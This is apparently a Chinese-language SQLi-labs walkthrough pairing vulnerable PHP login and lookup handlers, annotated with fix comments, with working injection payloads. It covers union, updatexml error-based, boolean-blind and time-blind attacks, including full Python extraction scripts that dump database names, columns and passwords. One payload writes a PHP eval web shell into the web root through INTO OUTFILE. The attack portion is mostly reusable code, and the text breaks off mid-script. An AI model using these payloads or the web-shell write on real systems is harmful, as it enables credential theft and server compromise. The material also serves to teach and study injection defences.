


//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup (fuller handlers appear later on this page).
// Injection point: $id is spliced into a single-quoted SQL literal with no
// escaping, so a quote in the input closes the literal and the rest of the
// input is parsed as SQL. Fix: a prepared statement with $id bound as a
// parameter (or an integer cast if id is numeric).
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page. The return value is not checked.
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    // The password column is returned to the client as-is, so whatever row the
    // (injectable) query above selects is displayed here.
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  

当知道是字符型注入可以直接构造去形成新的查询语句,输入'or 1=1--+,得到的语句就是SELECT * FROM users WHERE id=''or 1=1--+' LIMIT 0,1,直接截断了,并形成永真的语句,--+为mysql的注释,后面的语句全部被注释了,尝试payload




尝试联合查询' and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+,获取数据库名字


获取表名' and 1=2 union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+


获取列名' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+




//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup, numeric form. There is no quoting around $id at
// all, so any non-numeric input is appended directly to the statement; no
// quote character is needed to break out. Fix: intval($id) before use, or a
// prepared statement with $id bound as an integer parameter.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page. The return value is not checked.
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    // The password column is returned to the client as-is.
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  

1 and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+



//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup with the value wrapped in single quotes and
// parentheses. The wrapping only changes which characters an injected string
// has to close; it does not sanitize $id. Fix: prepared statement with $id
// bound as a parameter.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page. The return value is not checked.
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    // The password column is returned to the client as-is.
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  

从 `$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";` 可以看到 id 被单引号和括号括起来了,只需要用 `1')` 闭合引号和括号,再把后面的语句注释掉,就可以直接拼接 payload

1') and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+



//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup, double-quoted form. Surrounding the value with
// double quotes here is concatenation, not escaping: a `"` inside the input
// still terminates the literal in the statement below. Fix: prepared
// statement with $id bound as a parameter.
$id = '"' . $id . '"';
// Injection point: the quoted value is interpolated into the SQL text unescaped.
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page. The return value is not checked.
$row = mysql_fetch_array($result);

    echo "<font size='5' color= '#99FF00'>";
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    // The password column is returned to the client as-is.
    echo 'Your Password:' .$row['password'];
    echo "</font>";
    echo '<font color= "#FFFF00">';
    echo "</font>";  


输入一个1进来后的sql语句,SELECT * FROM users WHERE id=("1") LIMIT 0,1,直接闭合输入1")--+,并且把后面注释掉,SELECT * FROM users WHERE id=("1")--+") LIMIT 0,1

1") and 1=2 union select 1,database(),3 from information_schema.columns where table_schema=database()--+



//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup that prints no row data. Injection point: $id is
// interpolated into a single-quoted literal unescaped. Because the only thing
// the client sees is the fixed 'You are in...........' banner, the page acts
// as a yes/no oracle for any injected condition (and, as the prose below
// notes, database error text -- if surfaced -- becomes a second channel).
// Fix: prepared statement with $id bound; never return raw database errors.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page.
$row = mysql_fetch_array($result);

    // NOTE(review): the if($row)/else structure around these echoes is not
    // shown in this excerpt; the indentation suggests the first group is the
    // success branch and the second the failure branch.
    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
        echo "</font>";

    echo '<font size="3" color="#FFFF00">';
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    


审计代码发现:查询到结果就输出 You are in...........,查询出错就输出错误信息,所以这里直接用报错注入




爆库1'and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+


爆表1'and updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)--+





//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup, double-quoted form, printing no row data.
// Surrounding the value with double quotes is concatenation, not escaping:
// a `"` in the input still terminates the literal. Only the fixed banner is
// returned, so the page is a yes/no oracle for injected conditions.
// Fix: prepared statement with $id bound; never return raw database errors.
$id = '"'.$id.'"';
// Injection point: the quoted value is interpolated into the SQL text unescaped.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page.
$row = mysql_fetch_array($result);

    // NOTE(review): the if($row)/else structure around these echoes is not
    // shown in this excerpt.
    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";

    echo '<font size="3"  color= "#FFFF00">';
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    



1" and updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+



//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup with the value wrapped in single quotes and two
// pairs of parentheses. The wrapping does not sanitize $id. This variant
// returns a fixed generic error string instead of mysql_error(), and its
// banner points at INTO OUTFILE. Whether a file write through the database is
// possible depends on the database account holding the FILE privilege, the
// server's secure_file_priv setting permitting the target directory, and the
// database process being able to write into the web root; running the
// application's database user without FILE and with secure_file_priv set
// closes that path independently of the injection itself.
// Fix for the injection: prepared statement with $id bound as a parameter.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page.
$row = mysql_fetch_array($result);

    // NOTE(review): the if($row)/else structure around these echoes is not
    // shown in this excerpt.
    echo '<font color= "#FFFF00">'; 
    echo 'You are in.... Use outfile......';
    echo "<br>";
    echo "</font>";
    echo '<font color= "#FFFF00">';
    // A fixed message rather than the database's own error text.
    echo 'You have an error in your SQL syntax';
    echo "</font>";  

这里提示用文件写入,You are in.... Use outfile......,可以直接写shell文件上去




1')) union select 1,2,"<?php @eval($_POST['laotun'])?>" into outfile "C:\\inetpub\\target\\sqlilabs\\Less-7\\shell.php"--+,直接使用蚁剑连接即可



//logging the connection parameters to a file for analysis.

// Excerpt of the id lookup whose failure branch prints nothing identifying:
// the banner and the error echo are both commented out there. The response
// therefore differs only by the presence of 'You are in...........', which is
// the yes/no oracle the boolean-based script on this page keys on.
// Injection point: $id in a single-quoted literal, unescaped.
// Fix: prepared statement with $id bound as a parameter.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
// NOTE(review): $result is not set in this excerpt; presumably mysql_query($sql)
// as in the fuller listings on this page.
$row = mysql_fetch_array($result);

    // NOTE(review): the if($row)/else structure around these echoes is not
    // shown in this excerpt; the second group reads as the failure branch.
    echo '<font size="5" color="#FFFF00">'; 
    echo 'You are in...........';
    echo "<br>";
        echo "</font>";

    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";    
    echo '<font color= "#0000ff" font size= 3>';    





# Boolean-based blind extraction driver, as given in this writeup (reformatted;
# code unchanged). Defensive reading: every request carries a
# substr()/ascii() comparison in the id parameter and the same question is
# asked up to about seven times per character, so the traffic is a long run of
# near-identical requests from one client differing only in two numbers --
# an easy pattern for request-log review or a WAF rule. The root cause is the
# string-built SQL in the PHP excerpts on this page; a parameterized query
# removes it, and not exposing a fixed success/failure banner removes the oracle.
import re
import requests
import string

url = ""
flag = ''


def payload(i, j):
    """Return 1 if the success banner appears in the response, else 0.

    i is the 1-based character position and j the ASCII threshold the
    injected condition compares against.
    """
    # database name
    sql = "1' and iascii(substr(database(),%d,1))>%d--+"%(i,j)
    # table names
    #sql = "1' and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # column names
    #sql = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # the flag
    #sql = "1' and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)

    r = requests.get(url % sql)
    # print (r.url)

    # The fixed banner printed by the vulnerable page is the oracle.
    if "You are in..........." in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover characters one at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        # Each probe asks "is the character > mid?"; one request per probe.
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # A result at either end of the search range is treated as end of data.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()




# Time-based blind extraction driver, as given in this writeup (reformatted;
# code unchanged). Defensive reading: the injected condition calls sleep(5)
# when true and the script classifies any response slower than 2 s as "true".
# The PHP handler on this page prints the same text on both branches, so
# timing is the only oracle left; a server-side statement timeout and a cap on
# per-request execution time blunt it, and a parameterized query removes the
# injection entirely. In traffic this looks like a long run of near-identical
# requests from one client, each taking about 5 s.
import re
import requests
import string
import time

url = ""
flag = ''


def payload(i, j):
    """Return 1 if the request took more than 2 s, else 0.

    i is the 1-based character position and j the ASCII threshold the
    injected condition compares against.
    """
    startTime=time.time()
    # database name
    sql = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # table names
    #sql = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # column names
    #sql = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # the flag
    #sql = "1' and if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)

    r = requests.get(url + sql)
    # print (r.url)
    # Elapsed time, not response content, is the oracle here.
    if time.time()-startTime>2:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover characters one at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        # Each probe asks "is the character > mid?"; one request per probe.
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # A result at either end of the search range is treated as end of data.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()


// Handler for the id query parameter (reformatted; code unchanged).
// Defensive reading of this block:
//   * $id is read from the request and used unsanitized twice: appended to
//     result.txt and interpolated into the SQL text.
//   * The if and else branches print the same visible text, so the response
//     body gives no oracle; the only observable difference an injected
//     condition can produce is response time, which is what the sleep()-based
//     script on this page measures.
//   * Fix: bind $id as a parameter of a prepared statement (or cast it with
//     intval() if id is numeric), and do not write raw request parameters to
//     a log file.
if(isset($_GET['id']))
{
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // The raw value is appended with no length limit or escaping, so a newline
    // in the input forges extra log lines and the file grows without bound.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // Injection point: $id sits inside a single-quoted SQL literal unescaped.
    $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    }
    else
    {
        // Same banner as the success branch; the error output stays commented out.
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
}



# Time-based blind extraction driver, as given in this writeup (reformatted;
# code unchanged; identical to the earlier copy on this page). Defensive
# reading: the injected condition calls sleep(5) when true and the script
# classifies any response slower than 2 s as "true". With both branches of
# the handler printing the same text, timing is the only oracle left; a
# server-side statement timeout and a cap on per-request execution time
# blunt it, and a parameterized query removes the injection entirely. In
# traffic this looks like a long run of near-identical requests from one
# client, each taking about 5 s.
import re
import requests
import string
import time

url = ""
flag = ''


def payload(i, j):
    """Return 1 if the request took more than 2 s, else 0.

    i is the 1-based character position and j the ASCII threshold the
    injected condition compares against.
    """
    startTime=time.time()
    # database name
    sql = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # table names
    #sql = "1' and if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # column names
    #sql = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # the flag
    #sql = "1' and if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)

    r = requests.get(url + sql)
    # print (r.url)
    # Elapsed time, not response content, is the oracle here.
    if time.time()-startTime>2:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover characters one at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        # Each probe asks "is the character > mid?"; one request per probe.
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # A result at either end of the search range is treated as end of data.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()



// Handler for the id query parameter, double-quoted form (reformatted; code
// unchanged). Defensive reading of this block:
//   * $id is read from the request and used unsanitized twice: appended to
//     result.txt and interpolated into the SQL text. Wrapping it in double
//     quotes is concatenation, not escaping.
//   * The if and else branches print the same visible text, so the response
//     body gives no oracle; only response time can differ, which is what the
//     sleep()-based script on this page measures.
//   * Fix: bind $id as a parameter of a prepared statement (or cast it with
//     intval() if id is numeric), and do not write raw request parameters to
//     a log file.
if(isset($_GET['id']))
{
    $id=$_GET['id'];

    //logging the connection parameters to a file for analysis.
    // The raw value is appended with no length limit or escaping.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    $id = '"'.$id.'"';
    // Injection point: the quoted value is interpolated into the SQL text unescaped.
    $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        echo "<br>";
        echo "</font>";
    }
    else
    {
        // Same banner as the success branch; the error output stays commented out.
        echo '<font size="5" color="#FFFF00">';
        echo 'You are in...........';
        //print_r(mysql_error());
        //echo "You have an error in your SQL syntax";
        echo "</br></font>";
        echo '<font color= "#0000ff" font size= 3>';
    }
}


sql = "1' and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)改成

sql = "1\" and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)%%23"%(i,j)即可


// Login handler (POST uname/passwd), reformatted; code unchanged.
// Defensive reading:
//   * Both credentials are written in clear to result.txt before any check.
//   * Both are interpolated unescaped into the SQL text (injection points).
//   * On success the stored password is echoed back; on failure
//     print_r(mysql_error()) returns the database's own error text to the
//     client, which is the feedback channel error-based injection relies on.
//   * Fix: prepared statement with both values bound, comparison against a
//     password hash rather than the stored value, a generic failure message,
//     and no credential logging.
// NOTE(review): the closing brace of the outer if() is missing from this excerpt.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // The @ suppresses diagnostics on this assignment only; it does nothing
    // for the query below.
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // Stored password returned to the client verbatim.
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        // Raw database error text leaks to the response.
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }


1' order by 3%23可以测出只有两列


直接爆库1' union select 1,database()%23,后面的操作跟前面一样



// Login handler (POST uname/passwd), double-quoted parenthesised form;
// reformatted, code unchanged. Defensive reading:
//   * Both credentials are written in clear to result.txt before any check.
//   * Wrapping each value in double quotes is concatenation, not escaping;
//     both still reach the SQL text unescaped (injection points).
//   * On success the stored password is echoed back; on failure
//     print_r(mysql_error()) returns the database's own error text to the
//     client, the feedback channel error-based injection relies on.
//   * Fix: prepared statement with both values bound, comparison against a
//     password hash, a generic failure message, and no credential logging.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';

    // The @ suppresses diagnostics on this assignment only.
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        // Stored password returned to the client verbatim.
        echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"   />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        // Raw database error text leaks to the response.
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}


1") union select 1,database()%23



// Login handler (POST uname/passwd), single-quoted parenthesised form;
// reformatted, code unchanged. Defensive reading:
//   * Both credentials are written in clear to result.txt before any check.
//   * Both are interpolated unescaped into the SQL text (injection points).
//   * The success branch no longer prints row data, but the failure branch
//     still returns print_r(mysql_error()) -- the database's own error text --
//     to the client, which is the feedback channel error-based injection
//     relies on.
//   * Fix: prepared statement with both values bound, comparison against a
//     password hash, a generic failure message, and no credential logging.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // The @ suppresses diagnostics on this assignment only.
    @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"   />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        // Raw database error text leaks to the response.
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}


1') or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)%23



// Login handler (POST uname/passwd), double-quoted form without parentheses;
// reformatted, code unchanged. Defensive reading:
//   * Both credentials are written in clear to result.txt before any check.
//   * Wrapping each value in double quotes is concatenation, not escaping;
//     both still reach the SQL text unescaped (injection points).
//   * The success branch prints no row data, but the failure branch returns
//     print_r(mysql_error()) -- the database's own error text -- to the
//     client, which is the feedback channel error-based injection relies on.
//   * Fix: prepared statement with both values bound, comparison against a
//     password hash, a generic failure message, and no credential logging.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';

    // The @ suppresses diagnostics on this assignment only.
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        // Raw database error text leaks to the response.
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';
        echo "</font>";
    }
}


1" or updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)%23



// Login handler (POST uname/passwd) with errors and row data suppressed;
// reformatted, code unchanged. Defensive reading:
//   * Both credentials are written in clear to result.txt before any check.
//   * Both are interpolated unescaped into the SQL text (injection points).
//   * Neither branch prints row data or mysql_error(), but the two branches
//     reference different images (flag.jpg vs slap.jpg), so the response is
//     still a yes/no oracle -- the POST-based script on this page keys on
//     the string "flag.jpg".
//   * Fix: prepared statement with both values bound, comparison against a
//     password hash, and no credential logging. Identical responses for
//     "wrong user" and "wrong password" remove the remaining oracle.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname);
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    // The @ suppresses diagnostics on this assignment only.
    @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in\n\n " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';
        echo "</font>";
    }
}



# Boolean-based blind extraction driver against the login form, as given in
# this writeup (reformatted; code unchanged). Defensive reading: the oracle is
# which image the response references, so making the success and failure
# responses indistinguishable removes it, and a parameterized query removes
# the injection. In traffic this is a long run of POSTs from one client whose
# uname field carries substr()/ascii() and differs only in two numbers.
import requests

url = ""
flag = ''


def payload(i, j):
    """Return 1 if the success image is referenced in the response, else 0.

    i is the 1-based character position and j the ASCII threshold the
    injected condition compares against.
    """
    # database name
    sql = "1' or ascii(substr(database(),%d,1))>%d-- "%(i,j)
    # table names
    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # column names
    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # the flag
    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)
    data = {
        'uname': sql,
        'passwd': '1'
    }

    #r = requests.post(url, data)
    r = requests.request('POST', url, data=data)
    # print (r.url)
    # The image referenced by the success branch is the oracle.
    if "flag.jpg" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover characters one at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        # Each probe asks "is the character > mid?"; one request per probe.
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # A result at either end of the search range is treated as end of data.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()


// Login handler (POST uname/passwd), double-quoted parenthesised form with
// errors and row data suppressed; reformatted, code unchanged.
// Defensive reading:
//   * Both credentials are written in clear to result.txt before any check.
//   * Wrapping each value in double quotes is concatenation, not escaping;
//     both still reach the SQL text unescaped (injection points).
//   * Neither branch prints row data or mysql_error(), but the two branches
//     reference different images (flag.jpg vs slap.jpg), so the response is
//     still a yes/no oracle -- the second POST-based script on this page
//     keys on the string "flag.jpg".
//   * Fix: prepared statement with both values bound, comparison against a
//     password hash, no credential logging, and identical responses for
//     every failure mode.
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';

    // The @ suppresses diagnostics on this assignment only.
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        echo "</br>";
        echo "</br>";
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';
        echo "</font>";
    }
}



# Boolean-based blind extraction driver against the double-quoted login form,
# as given in this writeup (reformatted; code unchanged). Defensive reading:
# the oracle is which image the response references, so making the success
# and failure responses indistinguishable removes it, and a parameterized
# query removes the injection. In traffic this is a long run of POSTs from
# one client whose uname field carries substr()/ascii() and differs only in
# two numbers.
import requests

url = ""
flag = ''


def payload(i, j):
    """Return 1 if the success image is referenced in the response, else 0.

    i is the 1-based character position and j the ASCII threshold the
    injected condition compares against.
    """
    # database name
    sql = "1\") or ascii(substr(database(),%d,1))>%d-- "%(i,j)
    # table names
    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # column names
    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # the flag
    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)
    data = {
        'uname': sql,
        'passwd': '1'
    }

    #r = requests.post(url, data)
    r = requests.request('POST', url, data=data)
    # print (r.url)
    # The image referenced by the success branch is the oracle.
    if "flag.jpg" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover characters one at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        # Each probe asks "is the character > mid?"; one request per probe.
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
